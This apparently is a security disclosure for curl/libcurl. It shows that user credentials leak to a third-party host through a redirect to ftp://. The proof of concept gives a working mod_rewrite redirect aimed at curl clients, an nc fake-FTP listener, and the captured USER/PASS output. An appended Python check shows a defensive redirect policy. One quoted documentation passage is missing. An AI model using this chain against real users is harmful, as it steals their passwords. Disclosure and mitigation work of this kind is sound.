curl/libcurl can be coaxed into leaking user credentials to a third-party host by issuing an HTTP redirect to an ftp:// URL.
On firstsite.tld, perform the redirect with mod_rewrite:

```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
On secondsite.tld, run a minimal fake FTP server, for example with:

```
while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
```
Then, on the client:

```
curl -L --user foo https://firstsite.tld/redirectpoc
```

The nc listener on secondsite.tld receives the credentials:

```
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
```
There are several issues here:

- the credentials are sent to a different host than the one the user supplied them for (firstsite.tld vs secondsite.tld).

This is definitely not what the user could expect, considering the documentation says:

In addition, TLS SRP user credentials (CURLOPT_TLSAUTH_USERNAME and CURLOPT_TLSAUTH_PASSWORD) are also leaked on redirects.
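As an added example (not part of this report and not curl's own code), the following Python policy check shows the rule a redirect-following client should apply before reusing `--user` style credentials: forward them only when scheme, host and port of the redirect target are identical to the original request, and refuse to follow redirects to protocols that were not explicitly allowed. The function names, the scheme allow-list and the replayed Location chain are assumptions constructed to mirror the PoC above.

```python
from urllib.parse import urlsplit, urljoin

# Default ports used when the URL does not name one explicitly (assumption:
# these are the only schemes this toy client knows about).
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "ftps": 990}


def origin(url):
    """Return the (scheme, host, port) triple that identifies where credentials go."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def plan_redirect(current_url, location, allowed_schemes=("http", "https")):
    """Decide what to do with a Location header received for current_url.

    Returns the absolute target URL, whether the redirect may be followed at
    all (a scheme allow-list, the same idea as curl's --proto-redir), and
    whether the user's credentials may be sent to the target. Credentials are
    only attached when the origin triple is unchanged, so a redirect to
    another host, port or scheme never carries the password along.
    """
    target = urljoin(current_url, location)
    src, dst = origin(current_url), origin(target)
    follow = dst[0] in allowed_schemes
    send_credentials = follow and src == dst
    return {"url": target, "follow": follow, "send_credentials": send_credentials}


def walk_chain(start_url, locations, allowed_schemes=("http", "https")):
    """Replay a recorded chain of Location headers (constructed input) and
    report, for each hop, what the policy would do. Stops at the first hop
    the policy refuses to follow."""
    hops = []
    url = start_url
    for loc in locations:
        decision = plan_redirect(url, loc, allowed_schemes)
        hops.append(decision)
        if not decision["follow"]:
            break
        url = decision["url"]
    return hops


if __name__ == "__main__":
    # Constructed chain mirroring the report: HTTPS origin redirecting to ftp://.
    for hop in walk_chain("https://firstsite.tld/redirectpoc",
                          ["ftp://secondsite.tld:9999"]):
        print(hop)
```

With the chain from the PoC, `walk_chain` produces a single hop whose `follow` and `send_credentials` are both false: the ftp:// target is outside the allow-list, and even if ftp were allowed the origin triple differs, so the `USER`/`PASS` exchange seen above would never happen. The same comparison also blocks the subtler cases of a same-host redirect that changes only the port or downgrades https to http. On the curl command line the protocol allow-list part of this policy is available as `--proto-redir`.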
Leak of confidential information (user credentials).